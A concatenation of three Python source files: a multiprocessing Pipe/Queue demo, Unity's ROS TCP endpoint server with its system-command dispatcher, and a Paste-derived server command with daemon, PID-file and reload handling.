demo_message.py
# -*- coding: utf-8 -*-
# ======================================================
# @Time : 21-1-16 1:30 PM
# @Author : huang ha
# @Email : 1286304229@qq.com
# @File : demo_message.py
# @Comment:
# ======================================================
from multiprocessing import Process,Pipe,Queue
import multiprocessing as mp
def demo_1():
def f(conn):
# send
conn.send([42, None, 'hello'])
conn.close()
# Full duplex by default: returns two connection endpoints, one for sending and one for receiving; either end can play either role.
parent_conn, child_conn = Pipe()
p = Process(target=f, args=(child_conn,))
p.start()
# receive
print(parent_conn.recv()) # prints "[42, None, 'hello']"
# wait for the child process to finish
p.join()
def demo_2():
def f(q):
q.put([42, None, 'hello'])
q = Queue()
p = Process(target=f, args=(q,))
p.start()
print(q.get()) # prints "[42, None, 'hello']"
p.join()
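# Added sketch (not in the original file): since Pipe() is full duplex,
# both endpoints can send and receive on the same connection.
def demo_pipe_both_ways():
    def f(conn):
        conn.send('from child')
        print(conn.recv())  # prints "from parent"
        conn.close()
    parent_conn, child_conn = Pipe()
    p = Process(target=f, args=(child_conn,))
    p.start()
    print(parent_conn.recv())  # prints "from child"
    parent_conn.send('from parent')
    p.join()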
if __name__ == '__main__':
# mp.set_start_method('spawn')
# demo_1()
demo_2()
server.py
# Copyright 2020 Unity Technologies
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import json
import rospy
import socket
import logging
import threading
import importlib
from .tcp_sender import UnityTcpSender
from .client import ClientThread
from .subscriber import RosSubscriber
from .publisher import RosPublisher
from .service import RosService
from .unity_service import UnityService
class TcpServer:
"""
Initializes ROS node and TCP server.
"""
def __init__(self, node_name, buffer_size=1024, connections=2, tcp_ip="", tcp_port=-1):
"""
Initializes ROS node and class variables.
Args:
node_name: ROS node name for executing code
buffer_size: The read buffer size used when reading from a socket
connections: Max number of queued connections. See Python Socket documentation
tcp_ip: IP address to bind; if empty, falls back to the /ROS_IP param
tcp_port: Port to listen on; if -1, falls back to the /ROS_TCP_PORT param (default 10000)
"""
if tcp_ip != "":
self.tcp_ip = tcp_ip
else:
self.tcp_ip = rospy.get_param("/ROS_IP")
if tcp_port != -1:
self.tcp_port = tcp_port
else:
self.tcp_port = rospy.get_param("/ROS_TCP_PORT", 10000)
self.unity_tcp_sender = UnityTcpSender()
self.node_name = node_name
self.publishers = {}
self.subscribers = {}
self.ros_services = {}
self.unity_services = {}
self.buffer_size = buffer_size
self.connections = connections
self.syscommands = SysCommands(self)
self.pending_srv_id = None
self.pending_srv_is_request = False
def start(self, publishers=None, subscribers=None):
if publishers is not None:
self.publishers = publishers
if subscribers is not None:
self.subscribers = subscribers
server_thread = threading.Thread(target=self.listen_loop)
# Exit the server thread when the main thread terminates
server_thread.daemon = True
server_thread.start()
def listen_loop(self):
"""
Creates and binds sockets using TCP variables then listens for incoming connections.
For each new connection a client thread will be created to handle communication.
"""
rospy.loginfo("Starting server on {}:{}".format(self.tcp_ip, self.tcp_port))
tcp_server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcp_server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
tcp_server.bind((self.tcp_ip, self.tcp_port))
while True:
tcp_server.listen(self.connections)
try:
(conn, (ip, port)) = tcp_server.accept()
ClientThread(conn, self, ip, port).start()
except socket.timeout as err:
logging.exception("ros_tcp_endpoint.TcpServer: socket timeout")
def send_unity_error(self, error):
self.unity_tcp_sender.send_unity_error(error)
def send_unity_message(self, topic, message):
self.unity_tcp_sender.send_unity_message(topic, message)
def send_unity_service(self, topic, service_class, request):
return self.unity_tcp_sender.send_unity_service_request(topic, service_class, request)
def send_unity_service_response(self, srv_id, data):
self.unity_tcp_sender.send_unity_service_response(srv_id, data)
def handle_syscommand(self, topic, data):
function = getattr(self.syscommands, topic[2:], None) # default None so the check below works instead of raising AttributeError
if function is None:
self.send_unity_error("Don't understand SysCommand.'{}'".format(topic))
return
else:
message_json = data.decode("utf-8")
params = json.loads(message_json)
function(**params)
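# Dispatch example (payload illustrative): an incoming message on topic
# "__subscribe" with data b'{"topic": "/chatter", "message_name": "std_msgs/String"}'
# strips the two-character prefix and calls
# SysCommands.subscribe(topic="/chatter", message_name="std_msgs/String").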
class SysCommands:
def __init__(self, tcp_server):
self.tcp_server = tcp_server
def subscribe(self, topic, message_name):
if topic == "":
self.tcp_server.send_unity_error(
"Can't subscribe to a blank topic name! SysCommand.subscribe({}, {})".format(
topic, message_name
)
)
return
message_class = resolve_message_name(message_name)
if message_class is None:
self.tcp_server.send_unity_error(
"SysCommand.subscribe - Unknown message class '{}'".format(message_name)
)
return
rospy.loginfo("RegisterSubscriber({}, {}) OK".format(topic, message_class))
if topic in self.tcp_server.subscribers:
self.tcp_server.subscribers[topic].unregister()
self.tcp_server.subscribers[topic] = RosSubscriber(topic, message_class, self.tcp_server)
def publish(self, topic, message_name, queue_size=10, latch=False):
if topic == "":
self.tcp_server.send_unity_error(
"Can't publish to a blank topic name! SysCommand.publish({}, {})".format(
topic, message_name
)
)
return
message_class = resolve_message_name(message_name)
if message_class is None:
self.tcp_server.send_unity_error(
"SysCommand.publish - Unknown message class '{}'".format(message_name)
)
return
rospy.loginfo("RegisterPublisher({}, {}) OK".format(topic, message_class))
if topic in self.tcp_server.publishers:
self.tcp_server.publishers[topic].unregister()
self.tcp_server.publishers[topic] = RosPublisher(topic, message_class, queue_size, latch)
def ros_service(self, topic, message_name):
if topic == "":
self.tcp_server.send_unity_error(
"RegisterRosService({}, {}) - Can't register a blank topic name!".format(
topic, message_name
)
)
return
message_class = resolve_message_name(message_name, "srv")
if message_class is None:
self.tcp_server.send_unity_error(
"RegisterRosService({}, {}) - Unknown service class '{}'".format(
topic, message_name, message_name
)
)
return
rospy.loginfo("RegisterRosService({}, {}) OK".format(topic, message_class))
if topic in self.tcp_server.ros_services:
self.tcp_server.ros_services[topic].unregister()
self.tcp_server.ros_services[topic] = RosService(topic, message_class)
def unity_service(self, topic, message_name):
if topic == "":
self.tcp_server.send_unity_error(
"RegisterUnityService({}, {}) - Can't register a blank topic name!".format(
topic, message_name
)
)
return
message_class = resolve_message_name(message_name, "srv")
if message_class is None:
self.tcp_server.send_unity_error(
"RegisterUnityService({}, {}) - Unknown service class '{}'".format(
topic, message_name, message_name
)
)
return
rospy.loginfo("RegisterUnityService({}, {}) OK".format(topic, message_class))
if topic in self.tcp_server.unity_services:
self.tcp_server.unity_services[topic].unregister()
self.tcp_server.unity_services[topic] = UnityService(topic, message_class, self.tcp_server)
def response(self, srv_id): # the next message is a service response
self.tcp_server.pending_srv_id = srv_id
self.tcp_server.pending_srv_is_request = False
def request(self, srv_id): # the next message is a service request
self.tcp_server.pending_srv_id = srv_id
self.tcp_server.pending_srv_is_request = True
def topic_list(self):
self.tcp_server.unity_tcp_sender.send_topic_list()
def resolve_message_name(name, extension="msg"):
try:
names = name.split("/")
module_name = names[0]
class_name = names[1]
importlib.import_module(module_name + "." + extension)
module = sys.modules[module_name]
if module is None:
rospy.logerr("Failed to resolve module {}".format(module_name))
module = getattr(module, extension)
if module is None:
rospy.logerr("Failed to resolve module {}.{}".format(module_name, extension))
module = getattr(module, class_name)
if module is None:
rospy.logerr(
"Failed to resolve module {}.{}.{}".format(module_name, extension, class_name)
)
return module
except (IndexError, KeyError, AttributeError, ImportError) as e:
rospy.logerr("Failed to resolve message name: {}".format(e))
return None
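# Added usage sketch (hypothetical, not part of this file): launching the
# endpoint roughly the way a stock entry-point script would. Assumes a running
# roscore and that the /ROS_IP param is set (or pass tcp_ip= explicitly); this
# module uses relative imports, so in practice the snippet belongs in a
# separate script that imports TcpServer.
#
#   import rospy
#   from ros_tcp_endpoint import TcpServer
#
#   tcp_server = TcpServer("TCPServer")
#   rospy.init_node("TCPServer", anonymous=True)
#   tcp_server.start()
#   rospy.spin()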
serve.py
# Most of this code is:
# (c) 2005 Ian Bicking and contributors; written for Paste (http://pythonpaste.org)
# Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
# The server command includes the additional header:
# For discussion of daemonizing:
# http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/278731
# Code taken also from QP:
# http://www.mems-exchange.org/software/qp/
# From lib/site.py
# Galaxy originally used PasteScript and PasteDeploy for application
# loading, to maintain compatibility we've internalized some of that
# code here, stripping out unneeded functionality.
# All top level imports from each package moved here and organized
import atexit
import configparser
import errno
import grp
import logging
import optparse
import os
import pwd
import re
import resource
import signal
import socket
import subprocess
import sys
import textwrap
import threading
import time
from gettext import gettext as _
from logging.config import fileConfig
from typing import Optional
from .loadwsgi import loadapp, loadserver
difflib = None
# ---- from paste.script.bool_optparse --------------------------------
"""
A subclass of ``optparse.OptionParser`` that allows boolean long
options (like ``--verbose``) to also take arguments (like
``--verbose=true``). Arguments *must* use ``=``.
"""
class BoolOptionParser(optparse.OptionParser):
def _process_long_opt(self, rargs, values):
arg = rargs.pop(0)
# Value explicitly attached to arg? Pretend it's the next
# argument.
if "=" in arg:
(opt, next_arg) = arg.split("=", 1)
rargs.insert(0, next_arg)
had_explicit_value = True
else:
opt = arg
had_explicit_value = False
opt = self._match_long_opt(opt)
option = self._long_opt[opt]
if option.takes_value():
nargs = option.nargs
if len(rargs) < nargs:
if nargs == 1:
self.error(_("%s option requires an argument") % opt)
else:
self.error(_("%s option requires %d arguments")
% (opt, nargs))
elif nargs == 1:
value = rargs.pop(0)
else:
value = tuple(rargs[0:nargs])
del rargs[0:nargs]
elif had_explicit_value:
value = rargs[0].lower().strip()
del rargs[0:1]
if value in ('true', 'yes', 'on', '1', 'y', 't'):
value = None
elif value in ('false', 'no', 'off', '0', 'n', 'f'):
# Don't process
return
else:
self.error(_('%s option takes a boolean value only (true/false)') % opt)
else:
value = None
option.process(opt, value, values, self)
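# Behavior sketch (illustrative): given
#   parser = BoolOptionParser()
#   parser.add_option('--verbose', action='store_true', dest='verbose', default=False)
# parsing ['--verbose=true'] acts like a bare --verbose (verbose becomes True),
# while ['--verbose=false'] is swallowed without processing, leaving the default.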
# ---- from paste.script.command --------------------------------------
# (c) 2005 Ian Bicking and contributors; written for Paste (http://pythonpaste.org)
# Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
class BadCommand(Exception):
def __init__(self, message, exit_code=2):
self.message = message
self.exit_code = exit_code
Exception.__init__(self, message)
def _get_message(self):
"""Getter for 'message'; needed only to override deprecation
in BaseException."""
return self.__message
def _set_message(self, value):
"""Setter for 'message'; needed only to override deprecation
in BaseException."""
self.__message = value
# BaseException.message has been deprecated since Python 2.6.
# To prevent DeprecationWarning from popping up over this
# pre-existing attribute, use a new property that takes lookup
# precedence.
message = property(_get_message, _set_message)
class NoDefault:
pass
# run and invoke methods moved below ServeCommand
class Command:
def __init__(self, name):
self.command_name = name
max_args = None
max_args_error = 'You must provide no more than %(max_args)s arguments'
min_args: Optional[int] = None
min_args_error = 'You must provide at least %(min_args)s arguments'
# If this command takes a configuration file, set this to 1 or -1
# Then if invoked through #! the config file will be put into the positional
# arguments -- at the beginning with 1, at the end with -1
takes_config_file: Optional[int] = None
# Grouped in help messages by this:
group_name = ''
required_args = ()
description: Optional[str] = None
usage = ''
hidden = False
# This is the default verbosity level; --quiet subtracts,
# --verbose adds:
default_verbosity = 0
# This is the default interactive state:
default_interactive = 0
return_code = 0
BadCommand = BadCommand
# Must define:
# parser
# summary
# command()
def run(self, args):
self.parse_args(args)
# Setup defaults:
for name, default in [('verbose', 0),
('quiet', 0),
('interactive', False),
('overwrite', False)]:
if not hasattr(self.options, name):
setattr(self.options, name, default)
if getattr(self.options, 'simulate', False):
self.options.verbose = max(self.options.verbose, 1)
self.interactive = self.default_interactive
if getattr(self.options, 'interactive', False):
self.interactive += self.options.interactive
if getattr(self.options, 'no_interactive', False):
self.interactive = False
self.verbose = self.default_verbosity
self.verbose += self.options.verbose
self.verbose -= self.options.quiet
self.simulate = getattr(self.options, 'simulate', False)
# For #! situations:
if os.environ.get('PASTE_CONFIG_FILE') and self.takes_config_file is not None:
take = self.takes_config_file
filename = os.environ.get('PASTE_CONFIG_FILE')
if take == 1:
self.args.insert(0, filename)
elif take == -1:
self.args.append(filename)
else:
assert 0, (
"Value takes_config_file must be None, 1, or -1 (not %r)"
% take)
if os.environ.get('PASTE_DEFAULT_QUIET'):
self.verbose = 0
# Validate:
if self.min_args is not None and len(self.args) < self.min_args:
raise BadCommand(
self.min_args_error % {'min_args': self.min_args,
'actual_args': len(self.args)})
if self.max_args is not None and len(self.args) > self.max_args:
raise BadCommand(
self.max_args_error % {'max_args': self.max_args,
'actual_args': len(self.args)})
for var_name, option_name in self.required_args:
if not getattr(self.options, var_name, None):
raise BadCommand(
'You must provide the option %s' % option_name)
result = self.command()
if result is None:
return self.return_code
else:
return result
def parse_args(self, args):
if self.usage:
usage = ' ' + self.usage
else:
usage = ''
self.parser.usage = "%prog [options]{}\n{}".format(
usage, self.summary)
self.parser.prog = self._prog_name()
if self.description:
desc = self.description
desc = textwrap.dedent(desc)
self.parser.description = desc
self.options, self.args = self.parser.parse_args(args)
def _prog_name(self):
return '{} {}'.format(os.path.basename(sys.argv[0]), self.command_name)
########################################
# Utility methods
########################################
def pad(self, s, length, dir='left'):
if len(s) >= length:
return s
if dir == 'left':
return s + ' ' * (length - len(s))
else:
return ' ' * (length - len(s)) + s
def _standard_parser(cls, verbose=True,
interactive=False,
no_interactive=False,
simulate=False,
quiet=False,
overwrite=False):
"""
Create a standard ``OptionParser`` instance.
Typically used like::
class MyCommand(Command):
parser = Command.standard_parser()
Subclasses may redefine ``standard_parser``, so use the
nearest superclass's class method.
"""
parser = BoolOptionParser()
if verbose:
parser.add_option('-v', '--verbose',
action='count',
dest='verbose',
default=0)
if quiet:
parser.add_option('-q', '--quiet',
action='count',
dest='quiet',
default=0)
if no_interactive:
parser.add_option('--no-interactive',
action="count",
dest="no_interactive",
default=0)
if interactive:
parser.add_option('-i', '--interactive',
action='count',
dest='interactive',
default=0)
if simulate:
parser.add_option('-n', '--simulate',
action='store_true',
dest='simulate',
default=False)
if overwrite:
parser.add_option('-f', '--overwrite',
dest="overwrite",
action="store_true",
help="Overwrite files (warnings will be emitted for non-matching files otherwise)")
return parser
standard_parser = classmethod(_standard_parser)
def quote_first_command_arg(self, arg):
"""
There's a bug in Windows when running an executable that's
located inside a path with a space in it. This method handles
that case, or on non-Windows systems or an executable with no
spaces, it just leaves well enough alone.
"""
if sys.platform != 'win32' or ' ' not in arg:
# Problem does not apply:
return arg
try:
import win32api
except ImportError:
raise ValueError(
"The executable %r contains a space, and in order to "
"handle this issue you must have the win32api module "
"installed" % arg)
arg = win32api.GetShortPathName(arg)
return arg
def parse_vars(self, args):
"""
Given variables like ``['a=b', 'c=d']`` turns it into ``{'a':
'b', 'c': 'd'}``
"""
result = {}
for arg in args:
if '=' not in arg:
raise BadCommand(
'Variable assignment %r invalid (no "=")'
% arg)
name, value = arg.split('=', 1)
result[name] = value
return result
def logging_file_config(self, config_file):
"""
Setup logging via the logging module's fileConfig function with the
specified ``config_file``, if applicable.
ConfigParser defaults are specified for the special ``__file__``
and ``here`` variables, similar to PasteDeploy config loading.
"""
parser = configparser.ConfigParser()
parser.read([config_file])
if parser.has_section('loggers'):
config_file = os.path.abspath(config_file)
fileConfig(config_file, dict(__file__=config_file,
here=os.path.dirname(config_file)))
class NotFoundCommand(Command):
def run(self, args):
print('Command %r not known (you may need to run setup.py egg_info)'
% self.command_name)
commands = list()
commands.sort()
if not commands:
print('No commands registered.')
print('Have you installed Paste Script?')
print('(try running python setup.py develop)')
return 2
print('Known commands:')
longest = max([len(n) for n, c in commands])
for name, command in commands:
print(' {} {}'.format(self.pad(name, length=longest),
command.load().summary))
return 2
# ---- From paste.script.serve ----------------------------------------
MAXFD = 1024
jython = sys.platform.startswith('java')
class DaemonizeException(Exception):
pass
class ServeCommand(Command):
min_args = 0
usage = 'CONFIG_FILE [start|stop|restart|status] [var=value]'
takes_config_file = 1
summary = "Serve the described application"
description: Optional[str] = """\
This command serves a web application that uses a paste.deploy
configuration file for the server and application.
If start/stop/restart is given, then --daemon is implied, and it will
start (normal operation), stop (--stop-daemon), or do both.
You can also include variable assignments like 'http_port=8080'
and then use %(http_port)s in your config files.
"""
# used by subclasses that configure apps and servers differently
requires_config_file = True
parser = Command.standard_parser(quiet=True)
parser.add_option('-n', '--app-name',
dest='app_name',
metavar='NAME',
help="Load the named application (default main)")
parser.add_option('-s', '--server',
dest='server',
metavar='SERVER_TYPE',
help="Use the named server.")
parser.add_option('--server-name',
dest='server_name',
metavar='SECTION_NAME',
help="Use the named server as defined in the configuration file (default: main)")
if hasattr(os, 'fork'):
parser.add_option('--daemon',
dest="daemon",
action="store_true",
help="Run in daemon (background) mode")
parser.add_option('--pid-file',
dest='pid_file',
metavar='FILENAME',
help="Save PID to file (default to paster.pid if running in daemon mode)")
parser.add_option('--log-file',
dest='log_file',
metavar='LOG_FILE',
help="Save output to the given log file (redirects stdout)")
parser.add_option('--reload',
dest='reload',
action='store_true',
help="Use auto-restart file monitor")
parser.add_option('--reload-interval',
dest='reload_interval',
default=1,
help="Seconds between checking files (low number can cause significant CPU usage)")
parser.add_option('--monitor-restart',
dest='monitor_restart',
action='store_true',
help="Auto-restart server if it dies")
parser.add_option('--status',
action='store_true',
dest='show_status',
help="Show the status of the (presumably daemonized) server")
if hasattr(os, 'setuid'):
# I don't think these are available on Windows
parser.add_option('--user',
dest='set_user',
metavar="USERNAME",
help="Set the user (usually only possible when run as root)")
parser.add_option('--group',
dest='set_group',
metavar="GROUP",
help="Set the group (usually only possible when run as root)")
parser.add_option('--stop-daemon',
dest='stop_daemon',
action='store_true',
help='Stop a daemonized server (given a PID file, or default paster.pid file)')
if jython:
parser.add_option('--disable-jython-reloader',
action='store_true',
dest='disable_jython_reloader',
help="Disable the Jython reloader")
_scheme_re = re.compile(r'^[a-z][a-z]+:', re.I)
default_verbosity = 1
_reloader_environ_key = 'PYTHON_RELOADER_SHOULD_RUN'
_monitor_environ_key = 'PASTE_MONITOR_SHOULD_RUN'
possible_subcommands = ('start', 'stop', 'restart', 'status')
def command(self):
if self.options.stop_daemon:
return self.stop_daemon()
if not hasattr(self.options, 'set_user'):
# Windows case:
self.options.set_user = self.options.set_group = None
# @@: Is this the right stage to set the user at?
self.change_user_group(
self.options.set_user, self.options.set_group)
if self.requires_config_file:
if not self.args:
raise BadCommand('You must give a config file')
app_spec = self.args[0]
if len(self.args) > 1 and self.args[1] in self.possible_subcommands:
cmd = self.args[1]
restvars = self.args[2:]
else:
cmd = None
restvars = self.args[1:]
else:
app_spec = ""
if self.args and self.args[0] in self.possible_subcommands:
cmd = self.args[0]
restvars = self.args[1:]
else:
cmd = None
restvars = self.args[:]
if (getattr(self.options, 'daemon', False)
and getattr(self.options, 'reload', False)):
raise BadCommand('The --daemon and --reload options may not be used together')
jython_monitor = False
if self.options.reload:
if jython and not self.options.disable_jython_reloader:
# JythonMonitor raises the special SystemRestart
# exception that'll cause the Jython interpreter to
# reload in the existing Java process (avoiding
# subprocess startup time)
try:
from paste.reloader import JythonMonitor
except ImportError:
pass
else:
jython_monitor = JythonMonitor(poll_interval=int(
self.options.reload_interval))
if self.requires_config_file:
jython_monitor.watch_file(self.args[0])
if not jython_monitor:
if os.environ.get(self._reloader_environ_key):
from paste import reloader
if self.verbose > 1:
print('Running reloading file monitor')
reloader.install(int(self.options.reload_interval))
if self.requires_config_file:
reloader.watch_file(self.args[0])
else:
return self.restart_with_reloader()
if cmd not in (None, 'start', 'stop', 'restart', 'status'):
raise BadCommand(
'Error: must give start|stop|restart (not %s)' % cmd)
if cmd == 'status' or self.options.show_status:
return self.show_status()
if cmd == 'restart' or cmd == 'stop':
result = self.stop_daemon()
if result:
print("Could not stop daemon")
# It's ok to continue trying to restart if stop_daemon returns
# a 1, otherwise shortcut and return.
if cmd == 'restart' and result != 1:
return result
if cmd == 'stop':
return result
self.options.daemon = True
if cmd == 'start':
self.options.daemon = True
app_name = self.options.app_name
vars = self.parse_vars(restvars)
if not self._scheme_re.search(app_spec):
app_spec = 'config:' + app_spec
server_name = self.options.server_name
if self.options.server:
server_spec = 'egg:PasteScript'
assert server_name is None
server_name = self.options.server
else:
server_spec = app_spec
base = os.getcwd()
if getattr(self.options, 'daemon', False):
if not self.options.pid_file:
self.options.pid_file = 'paster.pid'
if not self.options.log_file:
self.options.log_file = 'paster.log'
# Ensure the log file is writeable
if self.options.log_file:
try:
writeable_log_file = open(self.options.log_file, 'a')
except OSError as ioe:
msg = 'Error: Unable to write to log file: %s' % ioe
raise BadCommand(msg)
writeable_log_file.close()
# Ensure the pid file is writeable
if self.options.pid_file:
try:
writeable_pid_file = open(self.options.pid_file, 'a')
except OSError as ioe:
msg = 'Error: Unable to write to pid file: %s' % ioe
raise BadCommand(msg)
writeable_pid_file.close()
if getattr(self.options, 'daemon', False):
try:
self.daemonize()
except DaemonizeException as ex:
if self.verbose > 0:
print(str(ex))
return
if (self.options.monitor_restart and not
os.environ.get(self._monitor_environ_key)):
return self.restart_with_monitor()
if self.options.pid_file:
self.record_pid(self.options.pid_file)
if self.options.log_file:
stdout_log = LazyWriter(self.options.log_file, 'a')
sys.stdout = stdout_log
sys.stderr = stdout_log
logging.basicConfig(stream=stdout_log)
log_fn = app_spec
if log_fn.startswith('config:'):
log_fn = app_spec[len('config:'):]
elif log_fn.startswith('egg:'):
log_fn = None
if log_fn:
log_fn = os.path.join(base, log_fn)
self.logging_file_config(log_fn)
server = loadserver(server_spec, name=server_name, relative_to=base, global_conf=vars)
app = loadapp(app_spec, name=app_name, relative_to=base, global_conf=vars)
if self.verbose > 0:
if hasattr(os, 'getpid'):
msg = 'Starting server in PID %i.' % os.getpid()
else:
msg = 'Starting server.'
print(msg)
def serve():
try:
server(app)
except (SystemExit, KeyboardInterrupt) as e:
if self.verbose > 1:
raise
if str(e):
msg = ' ' + str(e)
else:
msg = ''
print('Exiting%s (-v to see traceback)' % msg)
except AttributeError as e:
# Capturing bad error response from paste
if str(e) == "'WSGIThreadPoolServer' object has no attribute 'thread_pool'":
raise OSError(98, 'Address already in use')
else:
raise AttributeError(e)
if jython_monitor:
# JythonMonitor has to be ran from the main thread
threading.Thread(target=serve).start()
print('Starting Jython file monitor')
jython_monitor.periodic_reload()
else:
serve()
def daemonize(self):
pid = live_pidfile(self.options.pid_file)
if pid:
raise DaemonizeException(
"Daemon is already running (PID: %s from PID file %s)"
% (pid, self.options.pid_file))
if self.verbose > 0:
print('Entering daemon mode')
pid = os.fork()
if pid:
# The forked process also has a handle on resources, so we
# *don't* want proper termination of the process, we just
# want to exit quick (which os._exit() does)
os._exit(0)
# Make this the session leader
os.setsid()
# Fork again for good measure!
pid = os.fork()
if pid:
os._exit(0)
# @@: Should we set the umask and cwd now?
maxfd = resource.getrlimit(resource.RLIMIT_NOFILE)[1]
if maxfd == resource.RLIM_INFINITY:
maxfd = MAXFD
# Iterate through and close all file descriptors.
for fd in range(0, maxfd):
try:
os.close(fd)
except OSError: # ERROR, fd wasn't open to begin with (ignored)
pass
if hasattr(os, "devnull"):
REDIRECT_TO = os.devnull
else:
REDIRECT_TO = "/dev/null"
os.open(REDIRECT_TO, os.O_RDWR) # standard input (0)
# Duplicate standard input to standard output and standard error.
os.dup2(0, 1) # standard output (1)
os.dup2(0, 2) # standard error (2)
def record_pid(self, pid_file):
pid = os.getpid()
if self.verbose > 1:
print(f'Writing PID {pid} to {pid_file}')
f = open(pid_file, 'w')
f.write(str(pid))
f.close()
atexit.register(_remove_pid_file, pid, pid_file, self.verbose)
def stop_daemon(self):
pid_file = self.options.pid_file or 'paster.pid'
if not os.path.exists(pid_file):
print('No PID file exists in %s' % pid_file)
return 1
pid = read_pidfile(pid_file)
if not pid:
print("Not a valid PID file in %s" % pid_file)
return 1
pid = live_pidfile(pid_file)
if not pid:
print("PID in %s is not valid (deleting)" % pid_file)
try:
os.unlink(pid_file)
except OSError as e:
print("Could not delete: %s" % e)
return 2
return 1
for _i in range(10):
if not live_pidfile(pid_file):
break
os.kill(pid, signal.SIGTERM)
time.sleep(1)
else:
print("failed to kill web process %s" % pid)
return 3
if os.path.exists(pid_file):
os.unlink(pid_file)
return 0
def show_status(self):
pid_file = self.options.pid_file or 'paster.pid'
if not os.path.exists(pid_file):
print('No PID file %s' % pid_file)
return 1
file_pid = read_pidfile(pid_file)
if not file_pid:
print('No PID in file %s' % pid_file)
return 1
pid = live_pidfile(pid_file)
if not pid:
print(f'PID {file_pid} in {pid_file} is not running')
return 1
print('Server running in PID %s' % pid)
return 0
def restart_with_reloader(self):
return self.restart_with_monitor(reloader=True)
def restart_with_monitor(self, reloader=False):
if self.verbose > 0:
if reloader:
print('Starting subprocess with file monitor')
else:
print('Starting subprocess with monitor parent')
while 1:
args = [self.quote_first_command_arg(sys.executable)] + sys.argv
new_environ = os.environ.copy()
if reloader:
new_environ[self._reloader_environ_key] = 'true'
else:
new_environ[self._monitor_environ_key] = 'true'
proc = None
try:
try:
_turn_sigterm_into_systemexit()
proc = subprocess.Popen(args, env=new_environ)
exit_code = proc.wait()
proc = None
except KeyboardInterrupt:
print('^C caught in monitor process')
if self.verbose > 1:
raise
return 1
finally:
if proc is not None and hasattr(os, 'kill'):
try:
os.kill(proc.pid, signal.SIGTERM)
except OSError:
pass
if reloader:
# Reloader always exits with code 3; but if we are
# a monitor, any exit code will restart
if exit_code != 3:
return exit_code
if self.verbose > 0:
print('-' * 20, 'Restarting', '-' * 20)
def change_user_group(self, user, group):
if not user and not group:
return
uid = gid = None
if group:
try:
gid = int(group)
group = grp.getgrgid(gid).gr_name
except ValueError:
try:
entry = grp.getgrnam(group)
except KeyError:
raise BadCommand(
"Bad group: %r; no such group exists" % group)
gid = entry.gr_gid
if user: # guard: user may be None when only --group is given; int(None) would raise TypeError
try:
uid = int(user)
user = pwd.getpwuid(uid).pw_name
except ValueError:
try:
entry = pwd.getpwnam(user)
except KeyError:
raise BadCommand(
"Bad username: %r; no such user exists" % user)
if not gid:
gid = entry.pw_gid
uid = entry.pw_uid
if self.verbose > 0:
print('Changing user to {}:{} ({}:{})'.format(
user, group or '(unknown)', uid, gid))
if hasattr(os, 'initgroups'):
os.initgroups(user, gid)
else:
os.setgroups([e.gr_gid for e in grp.getgrall()
if user in e.gr_mem] + [gid])
if gid:
os.setgid(gid)
if uid:
os.setuid(uid)
class LazyWriter:
"""
File-like object that opens a file lazily when it is first written
to.
"""
def __init__(self, filename, mode='w'):
self.filename = filename
self.fileobj = None
self.lock = threading.Lock()
self.mode = mode
def open(self):
if self.fileobj is None:
self.lock.acquire()
try:
if self.fileobj is None:
self.fileobj = open(self.filename, self.mode)
finally:
self.lock.release()
return self.fileobj
def write(self, text):
fileobj = self.open()
fileobj.write(text)
fileobj.flush()
def writelines(self, text):
fileobj = self.open()
fileobj.writelines(text)
fileobj.flush()
def flush(self):
self.open().flush()
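# Usage sketch (mirrors the redirection done in ServeCommand.command() above):
#   stdout_log = LazyWriter('paster.log', 'a')
#   sys.stdout = stdout_log   # nothing is opened yet
#   print('hello')            # first write opens the file, writes, and flushes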
def live_pidfile(pidfile):
"""(pidfile:str) -> int | None
Returns an int found in the named file, if there is one,
and if there is a running process with that process id.
Return None if no such process exists.
"""
pid = read_pidfile(pidfile)
if pid:
try:
os.kill(int(pid), 0)
return pid
except OSError as e:
if e.errno == errno.EPERM:
return pid
return None
def read_pidfile(filename):
if os.path.exists(filename):
try:
f = open(filename)
content = f.read()
f.close()
return int(content.strip())
except (ValueError, OSError):
return None
else:
return None
def _remove_pid_file(written_pid, filename, verbosity):
current_pid = os.getpid()
if written_pid != current_pid:
# A forked process must be exiting, not the process that
# wrote the PID file
return
if not os.path.exists(filename):
return
f = open(filename)
content = f.read().strip()
f.close()
try:
pid_in_file = int(content)
except ValueError:
pass
else:
if pid_in_file != current_pid:
print("PID file {} contains {}, not expected PID {}".format(
filename, pid_in_file, current_pid))
return
if verbosity > 0:
print("Removing PID file %s" % filename)
try:
os.unlink(filename)
return
except OSError as e:
# Record, but don't give traceback
print("Cannot remove PID file: %s" % e)
# well, at least lets not leave the invalid PID around...
try:
f = open(filename, 'w')
f.write('')
f.close()
except OSError as e:
print(f'Stale PID left in file: {filename} ({e})')
else:
print('Stale PID removed')
def ensure_port_cleanup(bound_addresses, maxtries=30, sleeptime=2):
"""
This makes sure any open ports are closed.
Does this by connecting to them until they give connection
refused. Servers should call like::
import paste.script
ensure_port_cleanup([80, 443])
"""
atexit.register(_cleanup_ports, bound_addresses, maxtries=maxtries,
sleeptime=sleeptime)
def _cleanup_ports(bound_addresses, maxtries=30, sleeptime=2):
# Wait for the server to bind to the port.
for bound_address in bound_addresses:
for _i in range(maxtries):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect(bound_address)
except OSError as e:
if e.errno != errno.ECONNREFUSED:
raise
break
else:
time.sleep(sleeptime)
else:
raise SystemExit('Timeout waiting for port.')
sock.close()
def _turn_sigterm_into_systemexit():
"""
Attempts to turn a SIGTERM exception into a SystemExit exception.
"""
def handle_term(signo, frame):
raise SystemExit
signal.signal(signal.SIGTERM, handle_term)
# ---- from paste.script.command --------------------------------------
python_version = sys.version.splitlines()[0].strip()
parser = optparse.OptionParser(add_help_option=False,
# version='%s from %s (python %s)'
# % (dist, dist.location, python_version),
usage='%prog [paster_options] COMMAND [command_options]')
parser.add_option(
'-h', '--help',
action='store_true',
dest='do_help',
help="Show this help message")
parser.disable_interspersed_args()
